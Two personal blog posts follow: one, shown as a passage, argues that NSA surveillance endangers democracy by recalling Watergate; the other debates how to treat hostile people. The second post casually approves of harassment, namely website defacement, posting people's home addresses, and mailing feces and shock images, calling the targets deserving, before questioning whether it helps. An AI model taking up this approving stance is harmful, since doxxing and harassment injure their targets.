These real cases I can point to now are mostly local, but think bigger. There’s the FBI spying on Keystone XL activists, but I mean bigger than that. Consider Richard Nixon, whose enemies were black, white, and generally numerous. If Haldeman and Ehrlichman aren’t names right at the forefront of your consciousness, here’s a quick refresher: the president’s top staff hired some burglars to bug his Democratic opponent’s campaign headquarters, his lawyer unsuccessfully tried to get some money from the CIA to pay the burglars to keep quiet, the former attorney general eventually came up with the money, and a massive conspiracy ensued at the highest level of government to desperately try to keep this all secret. This was political corruption of the sort that is normally reserved for laughable kleptocracies. It is the kind of thing we want to believe couldn’t possibly happen in America. But it wasn’t even very long ago; some of the people involved in this are still alive.

Now imagine that these guys had access to the NSA’s technology today. I honestly do not understand how you could put those thoughts together and not see a problem for our entire system of government. What is going on today is not the “same old, same old”: Nixon had to hire some actual real guys to break into the DNC’s office to plant a physical microphone, but today the NSA could hand him all the information he could ask for, ready to go, with no one the wiser. Same goes for the burglary of Daniel Ellsberg’s psychiatrist’s office, and all the rest of the illegal or otherwise evil things that J. Edgar Hoover’s FBI was doing on Nixon’s behalf.

This is why I believe the activities of the NSA and FBI are an existential threat to our free society. I am not at all comfortable with the amount of distance separating their activities from the Stasi, the most effective secret police in history, and this former Stasi officer agrees. I know it seems like we wouldn’t allow things to get to that point here in the land of the free and the home of the brave, but I’m concerned that this complacent attitude is exactly why we may be in danger of it: if we don’t stop this now, we won’t be able to once it’s too late. If we allow this technology to exist, we have no idea who will come along and use it. The activities of Hoover’s FBI don’t seem like something we would allow in America, either, but it happened, and we may be setting the stage for it to happen again.

I don’t think the people setting up the system now intend to be creating the next Stasi. Most of them really do want to stop terrorists and drug cartels and all that. Every individual person involved can have the best intentions, but their collective efforts end up creating a system that gets out of control (n.b. I am deeply suspicious of the people in charge of the intelligence agencies, if not all of their underlings, but of course this is nothing new). Once it gets to that point, I think the history of the 60s and 70s shows that our democratic institutions would have trouble remaining pure, or at least however pure they currently are. You know that old saying about the relationship between power and corruption.


OK, so what do we do about it?

Today the Senate failed to renew the most controversial part of the Patriot Act, which was used to collect everyone’s phone records. That’s great, though I wouldn’t be surprised if the NSA got its hands on this bulk metadata another way, legal or otherwise. And more importantly, this doesn’t do anything about their wholesale surveillance of the internet.

But there is something else we can do. This issue is why I am planning to study security and cryptography when I go back to school this fall. If you would like one more link, here’s a piece published today explaining why I’m planning to cast my lot with the cypherpunks and crypto-anarchists rather than the politicians and lawyers (though you should still totally give your money to those lawyers at the EFF and ACLU).

If you’ve made it this far, wow, thanks. You probably have some thoughts after reading so many of mine, so feel free to share. You may not change my mind either, but I promise to listen and think about it, because you’ve already done me that courtesy.

To be or not to be (good) (or a troll)

Sunday, September 21st, 2014

I’m coming to some understanding with myself about how to at least define an issue that’s been nagging me for a few years. It boils down to how to relate to people who suck.

My natural inclination came into effect this afternoon when I was biking, which is a new thing I sometimes do now. A woman was making an illegal 3-point turn in a stupid place in her car, and a biker zoomed past behind her. She yelled at him for being an asshole. I patiently waited for her to properly orient her car and get out of my way, and then continued past and delivered a wiseass retort about how she was the one trying to turn around in the middle of the street, which unsurprisingly didn’t calm her down. I could have just ignored her or more politely pointed out her situation, but as a usual car driver, I felt she was asking to be taken down a notch for being so self-righteous.

Never mind the irony in me feeling the right to tell someone off for being self-righteous. The bigger problem I see here is the issue of whether this kind of behavior has a cumulative negative effect on the goodness of the world. I’ve been subconsciously (and now consciously) trying to figure out how I feel about this for the last 6 or 8 years.

A nice starting point is the hippies’ motto of peace and love. On the one hand, they were so obviously right that everyone should just be nice to each other that it actually does surprise me that it took such a large segment of American society that long to find the right words for it. Plenty of religions and cultures over thousands of years have come to the same conclusion. Eye for an eye → universal blindness, etc. The world would unquestionably be amazing if we just had peace and love all over the place.

But we don’t, and a lot of people explicitly reject this viewpoint. It is totally within our collective power to all decide to be nice to every single other human being, but it’s not happening now, and no matter how much acid we take it doesn’t look like the masses are about to start wearing flowers in their hair. So how should we act toward people who insist on being negative, discriminatory, hostile and greedy? There are a few options I’ve personally been considering.

Option 1: unilaterally disarm. Never mind how anyone else acts. You can only control your own behavior, so don’t partake in negativity towards other people, which only perpetuates the evil they started. Spread peace and love to anyone who is looking for it, and hope that the seeds you plant will eventually grow. Maybe disconnect entirely from the nasty parts of society and create a parallel good one. Serenity is its own reward. Ignore angry drivers.

Option 2: preach the gospel. Actively try to spread positivity and goodness. Work towards understanding between neighbors, who might start out not wanting what you’re offering. Try to improve society by participating in the good aspects of it. Maybe you can make the world a better place by reaching even one person. Be extra polite to stupid drivers, who might be having a bad day.

Option 3: strike back. Enforce your version of justice against the wicked. Drop wiseass remarks on asshole drivers, send photos of tubgirl to evil corporations, order deliveries of animal shit to racist police departments, deface their websites and post their home addresses. It’s unlikely that they’re actually going to have to reckon with Saint Peter (or be reincarnated as a cockroach or whatever your particular belief system suggests), so we better serve them their comeuppance in this life.

Maybe you can guess from my specific examples which option I enjoy. Which one I *should* choose, though, I believe is related to the question of “for good or for awesome?”

[graph: a quadrant chart with good/evil on one axis and awesome/lame on the other]

Shitty people totally deserve to be trolled, and I’m happy to do it. It’s hilarious and fun, and at the end of the day I just don’t feel bad about it. But it doesn’t actually make them or the entire world less shitty. There’s that whole “everyone ends up blind” thing. At best, it is neutral on the good-bad spectrum, but let’s be honest, it’s probably bad. The Dalai Lama and Jesus and Gandhi and an awful lot of other people have thought this through, and they have something of a point.

Trolling and violently spreading your version of right and wrong is basically vigilante justice. Internet anarchists happen to share enough of my politics that I’m usually down with Anonymous, but I wouldn’t be as psyched about some reactionary militia taking to the internet to go after LGBT websites or something like that. It’s pretty silly to claim a monopoly on right and wrong. On a day to day basis, there’s some value in trying to coexist with people you disagree with.

Option 2 finds its way to the Good-Lame quadrant mainly by being hard, and potentially preachy. Here again you may be assuming you’ve got the right/wrong situation all figured out. Spreading understanding, say among your actual immediate neighbors, is a good way to go, but much harder than distancing yourself from conflict and directing your virtue inward so as not to continue the cycle of negativity (option 1).

The main question I’m working on right now is just how bad option 3 is. If you’re talking about actual violence, clearly that’s bad. But trolling people who were already inclined to do bad things? Is sending around packages of poo really going to lead racist cops to commit more murders than they were already going to? Is exposing all those Uber employees to tubgirl really going to lead the company to more strongly support the next military police convention? I don’t want to believe so, but I’ve got to consider the possibility.

Peace and love are great. But what are we going to do about all these bad people?